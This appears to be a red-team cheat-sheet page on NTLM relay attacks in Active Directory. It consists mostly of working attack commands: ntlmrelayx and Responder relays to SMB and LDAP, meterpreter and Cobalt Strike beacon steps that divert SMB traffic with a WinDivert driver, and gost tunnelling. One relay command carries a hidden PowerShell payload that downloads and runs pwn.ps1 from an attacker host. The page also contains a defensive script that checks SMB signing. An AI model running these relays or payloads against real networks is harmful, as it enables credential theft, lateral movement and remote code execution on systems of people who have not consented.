# NTLM Relay

* <https://en.hackndo.com/ntlm-relay/>
* <https://blog.fox-it.com/2017/05/09/relaying-credentials-everywhere-with-ntlmrelayx/>
* <https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/>
* <https://www.secureauth.com/blog/playing-with-relayed-credentials/>
* <https://www.secureauth.com/blog/we-love-relaying-credentials-a-technical-guide-to-relaying-credentials-everywhere/>
* <https://intrinium.com/smb-relay-attack-tutorial/>
* <https://www.sans.org/blog/smb-relay-demystified-and-ntlmv2-pwnage-with-python/>
* <https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html>
* <https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire>
* <https://www.blackhillsinfosec.com/an-smb-relay-race-how-to-exploit-llmnr-and-smb-message-signing-for-fun-and-profit/>
* <https://clement.notin.org/blog/2020/11/16/ntlm-relay-of-adws-connections-with-impacket/>
* <https://luemmelsec.github.io/Relaying-101/>
* <https://www.thehacker.recipes/active-directory-domain-services/movement/lm-and-ntlm/relay>
* <https://www.trustedsec.com/blog/a-comprehensive-guide-on-relaying-anno-2022/>
* <https://www.fortalicesolutions.com/posts/keeping-up-with-the-ntlm-relay>
* <https://offsec.almond.consulting/ldap-relays-for-initial-foothold-in-dire-situations.html>
* <https://labs.nettitude.com/blog/network-relaying-abuse-windows-domain/>
* <https://xakep.ru/2023/04/07/ntlm-relay-guide/>
* <https://xakep.ru/2023/04/11/ntlm-relay-guide-2/>
* [\[PDF\] Coercions and Relays – The First Cred is the Deepest (Gabriel Prudhomme)](https://www.blackhillsinfosec.com/wp-content/uploads/2022/09/Coercions-and-Relays-The-First-Cred-is-the-Deepest.pdf)

{% embed url="https://youtu.be/b0lLxLJKaRs" %}

{% file src="/files/AJWHEZuwzA1ARbnYpDym" %}

Generate a relay list with CME (hosts whose SMB server does not require signing) and enumerate local admins while relaying:

```
$ cme smb 192.168.2.0/24 --gen-relay-list relay.txt
$ ntlmrelayx.py -tf relay.txt -smb2support --enum-local-admins -of net-ntlmv2 --no-http-server --no-wcf-server --no-raw-server
```
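What `--gen-relay-list` actually records is the set of hosts whose SMB server answers NEGOTIATE with signing not required, the one property that makes SMB relay possible and the setting a defender enforces to close it. The following added script (not part of this page, CME or impacket) performs that check by hand: it sends a raw SMB2 NEGOTIATE, reads the `SecurityMode` flags from the reply, and reports the negotiated dialect; `build_sample_response` constructs a server reply for offline testing, and the host/port passed to `check_host` are assumptions.

```python
import socket
import struct

SMB2_MAGIC, SIGNING_ENABLED, SIGNING_REQUIRED = b"\xfeSMB", 0x0001, 0x0002
DIALECTS = {0x0202: "2.0.2", 0x0210: "2.1", 0x0300: "3.0", 0x0302: "3.0.2", 0x0311: "3.1.1"}

def smb2_header(command: int) -> bytes:
    # 64-byte SMB2 header: no credits, no flags, message id 0, all-zero (unsigned) signature
    return SMB2_MAGIC + struct.pack("<HHIHHIIQIIQ16s", 64, 0, 0, command, 0, 0, 0, 0, 0, 0, 0, b"\x00" * 16)

def build_negotiate_request() -> bytes:
    # NEGOTIATE (command 0) offering SMB 2.0.2 to 3.0.2 (3.1.1 would need negotiate contexts);
    # we advertise SIGNING_ENABLED so the reply reflects the server's own policy, not ours
    dialects = [0x0202, 0x0210, 0x0300, 0x0302]
    body = struct.pack("<HHHHI16sIHH", 36, len(dialects), SIGNING_ENABLED, 0, 0, b"\x00" * 16, 0, 0, 0)
    body += b"".join(struct.pack("<H", d) for d in dialects)
    msg = smb2_header(0) + body
    return struct.pack(">I", len(msg)) + msg  # 4-byte NetBIOS session service header

def parse_negotiate_response(data: bytes) -> dict:
    # data = NetBIOS header + SMB2 header + NEGOTIATE response body (StructureSize is always 65)
    smb = data[4:]
    if smb[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 message")
    status, command = struct.unpack_from("<IH", smb, 8)
    struct_size, security_mode, dialect = struct.unpack_from("<HHH", smb, 64)
    if command != 0 or status != 0 or struct_size != 65:
        raise ValueError(f"unexpected reply: command={command} status={status:#010x} size={struct_size}")
    return {"dialect": DIALECTS.get(dialect, f"{dialect:#06x}"),
            "signing_enabled": bool(security_mode & SIGNING_ENABLED),
            "signing_required": bool(security_mode & SIGNING_REQUIRED)}

def build_sample_response(security_mode: int, dialect: int = 0x0302) -> bytes:
    # Constructed server reply for offline use; only the fields the parser reads carry real values
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, security_mode, dialect, 0, b"\x00" * 16, *([0] * 9)) + b"\x00"
    msg = smb2_header(0) + body
    return struct.pack(">I", len(msg)) + msg

def check_host(host: str, port: int = 445, timeout: float = 3.0) -> dict:
    # Live audit of one host (assumed address): send NEGOTIATE, read the NetBIOS-framed reply
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_negotiate_request())
        buf = b""
        while len(buf) < 4 or len(buf) < 4 + int.from_bytes(buf[1:4], "big"):
            chunk = s.recv(4096)
            if not chunk:
                raise ConnectionError("connection closed before a full NEGOTIATE reply arrived")
            buf += chunk
    return parse_negotiate_response(buf)
```

A host reporting `signing_required: False` is exactly what ends up in `relay.txt`; enforcing "Microsoft network server: Digitally sign communications (always)" flips that flag to `True`.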

Relay & catch hashes (via [multi-relay](https://www.thehacker.recipes/ad/movement/ntlm/relay#tips-and-tricks)):

```
$ smbserver.py -smb2support -port 8445 share `pwd`
$ ntlmrelayx.py -tf targets.txt -smb2support --no-http-server --no-wcf-server --no-raw-server
$ cat targets.txt
smb://10.10.13.37
smb://127.0.0.1:8445
```

{% hint style="info" %}
An easier way, though, is to combine the `-of/--output-file hashes.txt` and `-ntlmchallenge 1122334455667788` options to save the hashes, computed against a predefined challenge, to a file while relaying.
{% endhint %}

Relay NTLMv2 responses captured via Responder's proxy authentication (`-P`) to LDAP(S) (Responder's HTTP server must be set to `Off`):

{% embed url="https://twitter.com/theluemmel/status/1455099572305416197" %}

```
$ ntlmrelayx.py -t ldap(s)://DC01.megacorp.local --http-port 3128 [--add-computer] / [--delegate-access [--escalate-user 'PWNED-MACHINE$']] [-socks] --no-smb-server --no-wcf-server --no-raw-server --no-dump [--no-da --no-acl --no-validate-privs]
$ sudo ./Responder.py -I eth0 -wd -P -v
```

## Relaying on Windows

### meterpreter + SharpRelay

* <https://diablohorn.com/2018/08/25/remote-ntlm-relaying-through-meterpreter-on-windows-port-445/>
* <https://github.com/pkb1s/SharpRelay>

Divert incoming SMB traffic on Victim to the Attacker's local port 445 through an elevated meterpreter session, then relay it to Target via the MSF SOCKS server.

1\. Add a static route to the Target through the 1st meterpreter session:

```
meterpreter > route add 192.168.1.11/32 1
```

2\. Start MSF SOCKS server:

```
msf > use auxiliary/server/socks_proxy
msf auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
msf auxiliary(server/socks_proxy) > run -j
```

3\. Forward a reverse port 8445 on Victim to local port 445 on Attacker and start diverting incoming SMB traffic on Victim to Victim's local 8445 port:

```
meterpreter > portfwd add -R -L 127.0.0.1 -l 445 -p 8445
meterpreter > cd C:\\Windows\\System32\\drivers
meterpreter > upload /home/snovvcrash/www/WinDivert64.sys
msf post(windows/manage/execute_dotnet_assembly) > set SESSION 1
msf post(windows/manage/execute_dotnet_assembly) > set DOTNET_EXE /home/snovvcrash/www/SharpRelay.exe
msf post(windows/manage/execute_dotnet_assembly) > set ARGUMENTS relaysvc "C:\Windows\System32\drivers\WinDivert64.sys" 445 8445
msf post(windows/manage/execute_dotnet_assembly) > run
```

4\. Relay the diverted traffic to Target through SOCKS:

```
$ sudo proxychains4 -q ntlmrelayx.py -t smb://192.168.1.11 -smb2support
```

{% hint style="warning" %}
Once it has run, the driver must be unloaded or the host rebooted before trying again. The fake service can be deleted with a PowerShell command:

```
PS > (sc.exe stop relaysvc) -and (sc.exe delete relaysvc)
```

{% endhint %}

### beacon + PortBender

* <https://github.com/praetorian-inc/PortBender>
* <https://rastamouse.me/ntlm-relaying-via-cobalt-strike/>

Start a SOCKS server and a reverse port forward, upload the WinDivert driver and configure the redirection with PortBender:

```
beacon> socks 1080
beacon> rportfwd 8445 127.0.0.1 445
beacon> cd C:\Windows\System32\drivers
beacon> upload /home/snovvcrash/www/WinDivert64.sys
beacon> PortBender redirect 445 8445
```

Relay the planet:

```
$ sudo proxychains4 -q ntlmrelayx.py -t smb://192.168.1.11 -smb2support --no-http-server --no-wcf-server -c 'powershell -nop -w hidden -c "iex(new-object net.webclient).downloadstring(\"http://10.10.13.37:8080/pwn.ps1\")"'
```

Stop PortBender:

```
beacon> jobs
beacon> jobkill <JID>
beacon> kill <PID>
```

### gost (GO Simple Tunnel)

* <https://github.com/ginuerzh/gost>

Run gost on the Windows pivot as an `auto` (SOCKS5/HTTP) listener, then from the attacker open a reverse TCP tunnel through the SOCKS chain so that port 445 on the pivot is forwarded back to the attacker's port 445:

```
Cmd > gost.exe -L auto://0.0.0.0:31337
$ gost -L rtcp://0.0.0.0:445/10.10.13.37:445 -F socks5://127.0.0.1:10080 [-F socks5://127.0.0.1:20080 ...] -F socks5://192.168.1.11:31337
```

## CVE-2019-1040

* <https://github.com/fox-it/cve-2019-1040-scanner/blob/master/scan.py>

```
$ python scan.py MEGACORP/snovvcrash:'Passw0rd!'@192.168.1.11
$ python scan.py -target-file DCs.txt MEGACORP/snovvcrash:'Passw0rd!'@placeholder.xyz
```

## CVE-2025-33073

* [\[PDF\] Reflective Kerberos Relay Attack (RedTeam Pentesting)](https://www.redteam-pentesting.de/publications/2025-06-11-Reflective-Kerberos-Relay-Attack_RedTeam-Pentesting.pdf)
* <https://blog.redteam-pentesting.de/2025/reflective-kerberos-relay-attack/>
* <https://aegisbyte.com/resources/reflective-kerberos-relay-attack>
* <https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025>

### CVE-2025-54918

* <https://decoder.cloud/2025/11/24/reflecting-your-authentication-when-windows-ends-up-talking-to-itself/>
* <https://yousofnahya.medium.com/hands-on-exploitation-of-cve-2025-54918-cf376ebb40e1>
* <https://github.com/Wh0am123/CVE-2025-54918-POC>
